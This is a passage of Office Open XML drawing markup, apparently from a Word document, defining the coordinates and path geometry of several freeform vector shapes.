                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="73"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="109" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="47"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="47"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="47"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="124" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="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57" name="Freeform 311"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7974" y="3256"/>
                                <a:ext cx="135" cy="113"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 135 w 135"/>
                                  <a:gd name="T1" fmla="*/ 13 h 113"/>
                                  <a:gd name="T2" fmla="*/ 135 w 135"/>
                                  <a:gd name="T3" fmla="*/ 22 h 113"/>
                                  <a:gd name="T4" fmla="*/ 129 w 135"/>
                                  <a:gd name="T5" fmla="*/ 31 h 113"/>
                                  <a:gd name="T6" fmla="*/ 109 w 135"/>
                                  <a:gd name="T7" fmla="*/ 48 h 113"/>
                                  <a:gd name="T8" fmla="*/ 62 w 135"/>
                                  <a:gd name="T9" fmla="*/ 83 h 113"/>
                                  <a:gd name="T10" fmla="*/ 21 w 135"/>
                                  <a:gd name="T11" fmla="*/ 113 h 113"/>
                                  <a:gd name="T12" fmla="*/ 11 w 135"/>
                                  <a:gd name="T13" fmla="*/ 109 h 113"/>
                                  <a:gd name="T14" fmla="*/ 0 w 135"/>
                                  <a:gd name="T15" fmla="*/ 104 h 113"/>
                                  <a:gd name="T16" fmla="*/ 21 w 135"/>
                                  <a:gd name="T17" fmla="*/ 78 h 113"/>
                                  <a:gd name="T18" fmla="*/ 52 w 135"/>
                                  <a:gd name="T19" fmla="*/ 52 h 113"/>
                                  <a:gd name="T20" fmla="*/ 109 w 135"/>
                                  <a:gd name="T21" fmla="*/ 5 h 113"/>
                                  <a:gd name="T22" fmla="*/ 119 w 135"/>
                                  <a:gd name="T23" fmla="*/ 0 h 113"/>
                                  <a:gd name="T24" fmla="*/ 124 w 135"/>
                                  <a:gd name="T25" fmla="*/ 0 h 113"/>
                                  <a:gd name="T26" fmla="*/ 135 w 135"/>
                                  <a:gd name="T27" fmla="*/ 13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13">
                                    <a:moveTo>
                                      <a:pt x="135" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="135" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="109" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="83"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="113"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="109"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="104"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="109" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="124" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="13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12"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7783" y="3282"/>
                                <a:ext cx="62" cy="100"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 57 w 62"/>
                                  <a:gd name="T1" fmla="*/ 18 h 100"/>
                                  <a:gd name="T2" fmla="*/ 62 w 62"/>
                                  <a:gd name="T3" fmla="*/ 35 h 100"/>
                                  <a:gd name="T4" fmla="*/ 62 w 62"/>
                                  <a:gd name="T5" fmla="*/ 52 h 100"/>
                                  <a:gd name="T6" fmla="*/ 52 w 62"/>
                                  <a:gd name="T7" fmla="*/ 57 h 100"/>
                                  <a:gd name="T8" fmla="*/ 47 w 62"/>
                                  <a:gd name="T9" fmla="*/ 35 h 100"/>
                                  <a:gd name="T10" fmla="*/ 36 w 62"/>
                                  <a:gd name="T11" fmla="*/ 26 h 100"/>
                                  <a:gd name="T12" fmla="*/ 26 w 62"/>
                                  <a:gd name="T13" fmla="*/ 22 h 100"/>
                                  <a:gd name="T14" fmla="*/ 21 w 62"/>
                                  <a:gd name="T15" fmla="*/ 22 h 100"/>
                                  <a:gd name="T16" fmla="*/ 16 w 62"/>
                                  <a:gd name="T17" fmla="*/ 31 h 100"/>
                                  <a:gd name="T18" fmla="*/ 21 w 62"/>
                                  <a:gd name="T19" fmla="*/ 48 h 100"/>
                                  <a:gd name="T20" fmla="*/ 26 w 62"/>
                                  <a:gd name="T21" fmla="*/ 61 h 100"/>
                                  <a:gd name="T22" fmla="*/ 47 w 62"/>
                                  <a:gd name="T23" fmla="*/ 96 h 100"/>
                                  <a:gd name="T24" fmla="*/ 47 w 62"/>
                                  <a:gd name="T25" fmla="*/ 100 h 100"/>
                                  <a:gd name="T26" fmla="*/ 41 w 62"/>
                                  <a:gd name="T27" fmla="*/ 100 h 100"/>
                                  <a:gd name="T28" fmla="*/ 21 w 62"/>
                                  <a:gd name="T29" fmla="*/ 78 h 100"/>
                                  <a:gd name="T30" fmla="*/ 0 w 62"/>
                                  <a:gd name="T31" fmla="*/ 48 h 100"/>
                                  <a:gd name="T32" fmla="*/ 0 w 62"/>
                                  <a:gd name="T33" fmla="*/ 31 h 100"/>
                                  <a:gd name="T34" fmla="*/ 0 w 62"/>
                                  <a:gd name="T35" fmla="*/ 13 h 100"/>
                                  <a:gd name="T36" fmla="*/ 16 w 62"/>
                                  <a:gd name="T37" fmla="*/ 0 h 100"/>
                                  <a:gd name="T38" fmla="*/ 31 w 62"/>
                                  <a:gd name="T39" fmla="*/ 0 h 100"/>
                                  <a:gd name="T40" fmla="*/ 47 w 62"/>
                                  <a:gd name="T41" fmla="*/ 9 h 100"/>
                                  <a:gd name="T42" fmla="*/ 57 w 62"/>
                                  <a:gd name="T43" fmla="*/ 1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100">
                                    <a:moveTo>
                                      <a:pt x="57" y="18"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="57"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="96"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="100"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="100"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57"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59" name="Freeform 313"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8041" y="3317"/>
                                <a:ext cx="57" cy="48"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 57 w 57"/>
                                  <a:gd name="T1" fmla="*/ 4 h 48"/>
                                  <a:gd name="T2" fmla="*/ 6 w 57"/>
                                  <a:gd name="T3" fmla="*/ 48 h 48"/>
                                  <a:gd name="T4" fmla="*/ 0 w 57"/>
                                  <a:gd name="T5" fmla="*/ 48 h 48"/>
                                  <a:gd name="T6" fmla="*/ 26 w 57"/>
                                  <a:gd name="T7" fmla="*/ 22 h 48"/>
                                  <a:gd name="T8" fmla="*/ 42 w 57"/>
                                  <a:gd name="T9" fmla="*/ 9 h 48"/>
                                  <a:gd name="T10" fmla="*/ 57 w 57"/>
                                  <a:gd name="T11" fmla="*/ 0 h 48"/>
                                  <a:gd name="T12" fmla="*/ 57 w 57"/>
                                  <a:gd name="T13" fmla="*/ 4 h 48"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T8" y="T9"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T10" y="T11"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T12" y="T13"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="57" h="48">
                                    <a:moveTo>
                                      <a:pt x="57" y="4"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="4"/>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14"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7680" y="3321"/>
                                <a:ext cx="98" cy="57"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 98 w 98"/>
                                  <a:gd name="T1" fmla="*/ 44 h 57"/>
                                  <a:gd name="T2" fmla="*/ 98 w 98"/>
                                  <a:gd name="T3" fmla="*/ 52 h 57"/>
                                  <a:gd name="T4" fmla="*/ 93 w 98"/>
                                  <a:gd name="T5" fmla="*/ 52 h 57"/>
                                  <a:gd name="T6" fmla="*/ 62 w 98"/>
                                  <a:gd name="T7" fmla="*/ 31 h 57"/>
                                  <a:gd name="T8" fmla="*/ 46 w 98"/>
                                  <a:gd name="T9" fmla="*/ 18 h 57"/>
                                  <a:gd name="T10" fmla="*/ 41 w 98"/>
                                  <a:gd name="T11" fmla="*/ 18 h 57"/>
                                  <a:gd name="T12" fmla="*/ 25 w 98"/>
                                  <a:gd name="T13" fmla="*/ 22 h 57"/>
                                  <a:gd name="T14" fmla="*/ 20 w 98"/>
                                  <a:gd name="T15" fmla="*/ 26 h 57"/>
                                  <a:gd name="T16" fmla="*/ 25 w 98"/>
                                  <a:gd name="T17" fmla="*/ 35 h 57"/>
                                  <a:gd name="T18" fmla="*/ 36 w 98"/>
                                  <a:gd name="T19" fmla="*/ 39 h 57"/>
                                  <a:gd name="T20" fmla="*/ 41 w 98"/>
                                  <a:gd name="T21" fmla="*/ 44 h 57"/>
                                  <a:gd name="T22" fmla="*/ 36 w 98"/>
                                  <a:gd name="T23" fmla="*/ 57 h 57"/>
                                  <a:gd name="T24" fmla="*/ 20 w 98"/>
                                  <a:gd name="T25" fmla="*/ 52 h 57"/>
                                  <a:gd name="T26" fmla="*/ 5 w 98"/>
                                  <a:gd name="T27" fmla="*/ 35 h 57"/>
                                  <a:gd name="T28" fmla="*/ 0 w 98"/>
                                  <a:gd name="T29" fmla="*/ 22 h 57"/>
                                  <a:gd name="T30" fmla="*/ 0 w 98"/>
                                  <a:gd name="T31" fmla="*/ 13 h 57"/>
                                  <a:gd name="T32" fmla="*/ 10 w 98"/>
                                  <a:gd name="T33" fmla="*/ 5 h 57"/>
                                  <a:gd name="T34" fmla="*/ 20 w 98"/>
                                  <a:gd name="T35" fmla="*/ 0 h 57"/>
                                  <a:gd name="T36" fmla="*/ 46 w 98"/>
                                  <a:gd name="T37" fmla="*/ 0 h 57"/>
                                  <a:gd name="T38" fmla="*/ 67 w 98"/>
                                  <a:gd name="T39" fmla="*/ 13 h 57"/>
                                  <a:gd name="T40" fmla="*/ 88 w 98"/>
                                  <a:gd name="T41" fmla="*/ 26 h 57"/>
                                  <a:gd name="T42" fmla="*/ 98 w 98"/>
                                  <a:gd name="T43"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8" h="57">
                                    <a:moveTo>
                                      <a:pt x="98" y="44"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="25" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="25" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="44"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="57"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="4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61" name="Freeform 315"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8419" y="3321"/>
                                <a:ext cx="31" cy="39"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 26 w 31"/>
                                  <a:gd name="T1" fmla="*/ 39 h 39"/>
                                  <a:gd name="T2" fmla="*/ 10 w 31"/>
                                  <a:gd name="T3" fmla="*/ 39 h 39"/>
                                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                                  <a:gd name="T5" fmla="*/ 26 h 39"/>
                                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                                  <a:gd name="T7" fmla="*/ 0 h 39"/>
                                  <a:gd name="T8" fmla="*/ 26 w 31"/>
                                  <a:gd name="T9" fmla="*/ 18 h 39"/>
                                  <a:gd name="T10" fmla="*/ 31 w 31"/>
                                  <a:gd name="T11" fmla="*/ 26 h 39"/>
                                  <a:gd name="T12" fmla="*/ 31 w 31"/>
                                  <a:gd name="T13" fmla="*/ 35 h 39"/>
                                  <a:gd name="T14" fmla="*/ 26 w 31"/>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9">
                                    <a:moveTo>
                                      <a:pt x="26" y="39"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="39"/>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16"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7845" y="3326"/>
                                <a:ext cx="78" cy="86"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 72 w 78"/>
                                  <a:gd name="T1" fmla="*/ 13 h 86"/>
                                  <a:gd name="T2" fmla="*/ 78 w 78"/>
                                  <a:gd name="T3" fmla="*/ 17 h 86"/>
                                  <a:gd name="T4" fmla="*/ 78 w 78"/>
                                  <a:gd name="T5" fmla="*/ 26 h 86"/>
                                  <a:gd name="T6" fmla="*/ 72 w 78"/>
                                  <a:gd name="T7" fmla="*/ 43 h 86"/>
                                  <a:gd name="T8" fmla="*/ 67 w 78"/>
                                  <a:gd name="T9" fmla="*/ 52 h 86"/>
                                  <a:gd name="T10" fmla="*/ 57 w 78"/>
                                  <a:gd name="T11" fmla="*/ 52 h 86"/>
                                  <a:gd name="T12" fmla="*/ 52 w 78"/>
                                  <a:gd name="T13" fmla="*/ 43 h 86"/>
                                  <a:gd name="T14" fmla="*/ 52 w 78"/>
                                  <a:gd name="T15" fmla="*/ 30 h 86"/>
                                  <a:gd name="T16" fmla="*/ 52 w 78"/>
                                  <a:gd name="T17" fmla="*/ 17 h 86"/>
                                  <a:gd name="T18" fmla="*/ 47 w 78"/>
                                  <a:gd name="T19" fmla="*/ 17 h 86"/>
                                  <a:gd name="T20" fmla="*/ 36 w 78"/>
                                  <a:gd name="T21" fmla="*/ 17 h 86"/>
                                  <a:gd name="T22" fmla="*/ 21 w 78"/>
                                  <a:gd name="T23" fmla="*/ 34 h 86"/>
                                  <a:gd name="T24" fmla="*/ 21 w 78"/>
                                  <a:gd name="T25" fmla="*/ 52 h 86"/>
                                  <a:gd name="T26" fmla="*/ 21 w 78"/>
                                  <a:gd name="T27" fmla="*/ 86 h 86"/>
                                  <a:gd name="T28" fmla="*/ 16 w 78"/>
                                  <a:gd name="T29" fmla="*/ 86 h 86"/>
                                  <a:gd name="T30" fmla="*/ 10 w 78"/>
                                  <a:gd name="T31" fmla="*/ 86 h 86"/>
                                  <a:gd name="T32" fmla="*/ 5 w 78"/>
                                  <a:gd name="T33" fmla="*/ 65 h 86"/>
                                  <a:gd name="T34" fmla="*/ 0 w 78"/>
                                  <a:gd name="T35" fmla="*/ 47 h 86"/>
                                  <a:gd name="T36" fmla="*/ 5 w 78"/>
                                  <a:gd name="T37" fmla="*/ 26 h 86"/>
                                  <a:gd name="T38" fmla="*/ 16 w 78"/>
                                  <a:gd name="T39" fmla="*/ 13 h 86"/>
                                  <a:gd name="T40" fmla="*/ 31 w 78"/>
                                  <a:gd name="T41" fmla="*/ 4 h 86"/>
                                  <a:gd name="T42" fmla="*/ 36 w 78"/>
                                  <a:gd name="T43" fmla="*/ 0 h 86"/>
                                  <a:gd name="T44" fmla="*/ 57 w 78"/>
                                  <a:gd name="T45" fmla="*/ 4 h 86"/>
                                  <a:gd name="T46" fmla="*/ 72 w 78"/>
                                  <a:gd name="T47"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8" h="86">
                                    <a:moveTo>
                                      <a:pt x="72" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="78" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="78" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="86"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="86"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="86"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="47"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72"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63" name="Freeform 317"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8072" y="3330"/>
                                <a:ext cx="461" cy="394"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 455 w 461"/>
                                  <a:gd name="T1" fmla="*/ 26 h 394"/>
                                  <a:gd name="T2" fmla="*/ 429 w 461"/>
                                  <a:gd name="T3" fmla="*/ 26 h 394"/>
                                  <a:gd name="T4" fmla="*/ 409 w 461"/>
                                  <a:gd name="T5" fmla="*/ 43 h 394"/>
                                  <a:gd name="T6" fmla="*/ 393 w 461"/>
                                  <a:gd name="T7" fmla="*/ 125 h 394"/>
                                  <a:gd name="T8" fmla="*/ 321 w 461"/>
                                  <a:gd name="T9" fmla="*/ 182 h 394"/>
                                  <a:gd name="T10" fmla="*/ 228 w 461"/>
                                  <a:gd name="T11" fmla="*/ 173 h 394"/>
                                  <a:gd name="T12" fmla="*/ 125 w 461"/>
                                  <a:gd name="T13" fmla="*/ 108 h 394"/>
                                  <a:gd name="T14" fmla="*/ 212 w 461"/>
                                  <a:gd name="T15" fmla="*/ 221 h 394"/>
                                  <a:gd name="T16" fmla="*/ 218 w 461"/>
                                  <a:gd name="T17" fmla="*/ 281 h 394"/>
                                  <a:gd name="T18" fmla="*/ 166 w 461"/>
                                  <a:gd name="T19" fmla="*/ 329 h 394"/>
                                  <a:gd name="T20" fmla="*/ 88 w 461"/>
                                  <a:gd name="T21" fmla="*/ 342 h 394"/>
                                  <a:gd name="T22" fmla="*/ 16 w 461"/>
                                  <a:gd name="T23" fmla="*/ 364 h 394"/>
                                  <a:gd name="T24" fmla="*/ 37 w 461"/>
                                  <a:gd name="T25" fmla="*/ 372 h 394"/>
                                  <a:gd name="T26" fmla="*/ 42 w 461"/>
                                  <a:gd name="T27" fmla="*/ 381 h 394"/>
                                  <a:gd name="T28" fmla="*/ 6 w 461"/>
                                  <a:gd name="T29" fmla="*/ 394 h 394"/>
                                  <a:gd name="T30" fmla="*/ 0 w 461"/>
                                  <a:gd name="T31" fmla="*/ 364 h 394"/>
                                  <a:gd name="T32" fmla="*/ 52 w 461"/>
                                  <a:gd name="T33" fmla="*/ 333 h 394"/>
                                  <a:gd name="T34" fmla="*/ 73 w 461"/>
                                  <a:gd name="T35" fmla="*/ 316 h 394"/>
                                  <a:gd name="T36" fmla="*/ 42 w 461"/>
                                  <a:gd name="T37" fmla="*/ 281 h 394"/>
                                  <a:gd name="T38" fmla="*/ 62 w 461"/>
                                  <a:gd name="T39" fmla="*/ 238 h 394"/>
                                  <a:gd name="T40" fmla="*/ 130 w 461"/>
                                  <a:gd name="T41" fmla="*/ 234 h 394"/>
                                  <a:gd name="T42" fmla="*/ 140 w 461"/>
                                  <a:gd name="T43" fmla="*/ 255 h 394"/>
                                  <a:gd name="T44" fmla="*/ 104 w 461"/>
                                  <a:gd name="T45" fmla="*/ 255 h 394"/>
                                  <a:gd name="T46" fmla="*/ 94 w 461"/>
                                  <a:gd name="T47" fmla="*/ 281 h 394"/>
                                  <a:gd name="T48" fmla="*/ 145 w 461"/>
                                  <a:gd name="T49" fmla="*/ 299 h 394"/>
                                  <a:gd name="T50" fmla="*/ 192 w 461"/>
                                  <a:gd name="T51" fmla="*/ 255 h 394"/>
                                  <a:gd name="T52" fmla="*/ 171 w 461"/>
                                  <a:gd name="T53" fmla="*/ 182 h 394"/>
                                  <a:gd name="T54" fmla="*/ 145 w 461"/>
                                  <a:gd name="T55" fmla="*/ 160 h 394"/>
                                  <a:gd name="T56" fmla="*/ 171 w 461"/>
                                  <a:gd name="T57" fmla="*/ 216 h 394"/>
                                  <a:gd name="T58" fmla="*/ 156 w 461"/>
                                  <a:gd name="T59" fmla="*/ 208 h 394"/>
                                  <a:gd name="T60" fmla="*/ 104 w 461"/>
                                  <a:gd name="T61" fmla="*/ 130 h 394"/>
                                  <a:gd name="T62" fmla="*/ 37 w 461"/>
                                  <a:gd name="T63" fmla="*/ 13 h 394"/>
                                  <a:gd name="T64" fmla="*/ 207 w 461"/>
                                  <a:gd name="T65" fmla="*/ 125 h 394"/>
                                  <a:gd name="T66" fmla="*/ 264 w 461"/>
                                  <a:gd name="T67" fmla="*/ 143 h 394"/>
                                  <a:gd name="T68" fmla="*/ 176 w 461"/>
                                  <a:gd name="T69" fmla="*/ 130 h 394"/>
                                  <a:gd name="T70" fmla="*/ 238 w 461"/>
                                  <a:gd name="T71" fmla="*/ 160 h 394"/>
